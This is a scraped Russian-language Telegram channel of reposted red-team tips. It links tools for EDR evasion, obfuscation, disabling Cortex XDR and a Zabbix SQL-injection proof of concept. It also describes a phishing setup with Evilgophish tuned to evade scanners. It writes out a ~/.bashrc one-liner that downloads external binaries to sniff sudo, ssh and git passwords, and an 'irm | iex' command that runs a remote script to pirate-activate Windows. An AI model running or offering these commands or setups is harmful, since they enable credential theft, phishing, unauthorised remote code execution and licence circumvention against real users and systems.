Ralf Hacker Channel
27.9K subscribers
457 photos
16 videos
503 files
572 links
Download Telegram
Forwarded from Threat Hunt
#maldev #redteam

Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.

1. Собираем проект ./compile.sh
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса: .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

https://github.com/Helixo32/CrimsonEDR
🔥25👍6
Удобно, нужно просто подключить файл)

https://github.com/DosX-dev/obfus.h

🔍 Function Call Obfuscation: Confuse function calls to make your code less readable to unauthorized eyes.
🛡️ Anti-Debugging Techniques: Built-in mechanisms to prevent code analysis during runtime.
🔄 Control Flow Code Mutation: Turns code into spaghetti, making it difficult to parse conditions and loops.
🚫 Anti-Decompilation Techniques: Makes many popular decompilers useless visually breaking their output.


#obfuscate #redteam #maldev
🔥23👍6🥰2
CLI tool (python) for managing Cortex XDR
* changing rules
* restarting the XDR process
* disabling the local analysis engine
* inserting any python code to run

https://github.com/SafeBreach-Labs/CortexVortex

#edr #redteam #bypass
🔥12
Forwarded from PurpleBear (Vadim Shelest)
В продолжении темы про подготовку Red Teaming инфраструктуры для проведения социо-технических этапов тестирований aka фишинга для получения первоначального доступа, обычно используется Evilgophish от fin3ss3g0d.

По сути это форк оригинальных Evilginx и Gophish с расширенной функциональностью, о котором я уже неоднократно писал и рассказывал. Этот инструмент прямо из коробки позволяет настроить использование Cloudflare Turnstile в качестве эффективного решения для противодействия ботам и автоматизированным сканерам, которое в отличии от классических решений CAPTCHA с выбором картинок и набором текста совсем не влияет на UX😎

В блоге автора подробно описано каким образом настроить Cloudflare Turnstile:
Необходимо просто зарегать учетку Cloudflare (бесплатный уровень подписки), добавить домен фишинговой страницы и скопировать ключи для использования сервиса
./evilginx3 -feed -g ../gophish/gophish.db -turnstile <PUBLIC_KEY>:<PRIVATE_KEY>

Поменять дизайн дефолтных страниц с антибот-проверкой evilginx3/templates/turnstile.html и 403 Forbidden evilginx3/templates/forbidden.html, LLM справится с этой задачей за 3 секунды🙈
Let's go phishing🎣

К тому же злоумышленники уже давно используют эту технологию, поэтому по моему мнению очень важно проверить во время тестирований насколько используемые средства защиты и процессы в вашей организации позволяют противостоять подобным угрозам на практике.

#phishing #evilgophish #cloudflare_turnstile
👍16
Forwarded from Offensive Twitter
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]

A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀

command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'


🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking

🐥 [ tweet ]

прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
👍15🔥5😁3🤔2
intro.gif
860 KB
Почему-то только сегодня обратил внимание на эту удобную штуку (ох, два года уже репозиторию)😅

https://github.com/aniqfakhrul/powerview.py

#ad #pentest #enum
👍37🔥8😁3😱2
CVE-2024-22120: Time Based SQL Injection in Zabbix Server Audit Log

Affected and fixed version/s:
* 6.0.0 - 6.0.27 / 6.0.28rc1
* 6.4.0 - 6.4.12 / 6.4.13rc1
* 7.0.0alpha1 - 7.0.0beta1 / 7.0.0beta2


Allows to dump any values from database. As an example of exploit above allows privilege escalation from user to admin. In some cases, SQL injection leads to RCE.


PoC: https://support.zabbix.com/secure/attachment/236280/236280_zabbix_server_time_based_blind_sqli.py

#exploit #pentest
🔥22👍5🤯3
Media is too big
VIEW IN TELEGRAM
Накидайте поздравлений @Acrono, админу APT)
🔥125🥰13🎉13👍3
Forwarded from Offensive Twitter
Мое новое комбо для гига быстрого развертывания виндовируалок в лабе 👇🏻

Образы:
🔗 https://uupdump.net

Таблэтка:
🔗 https://github.com/massgravel/Microsoft-Activation-Scripts

irm https://get.activated.win | iex

Evaluation теперь идет лесом.
👍35🔥9😱2
Как развернуть свою лабу с SCCM: script, post. Список мисконфигов в конце поста)

#lab #ad #sccm
🔥29👍5🥰1🙏1
Forwarded from SHADOW:Group
🔎Собираем поддомены и IP в RSECloud

Недавно нашел новый ресурс, под названием RSECloud, который позволяет собирать поддомены и IP'шники организации по домену или имени организации. Работает как в вебе, так и через API.

Чтобы удобно прикрутить его к своей автоматизации накидал небольшой скрипт на GO, который предполагает 3 варианта использования:

Сбор поддоменов:
rsescan -d example.com -key YOUR_API_KEY


Сбор IP'шников по домену:
rsescan -d example.com -cn -key YOUR_API_KEY


Сбор IP'шников по имени организации:
rsescan -so "Organization Name" -key YOUR_API_KEY


Для получения API ключа нужно просто пройти регистрацию по почте. Для всех желающих залил скрипт на гитхаб.

Ссылка на RSECloud
Ссылка на скрипт

#web #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍39🔥3
Для опроса Defender'а Windows, например об исключениях (и ещё много о чем) на локальной или удалённой системе. Ещё и не нужно высоких привилегий.

https://github.com/0xsp-SRD/MDE_Enum

#git #soft #pentest #redteam
🔥18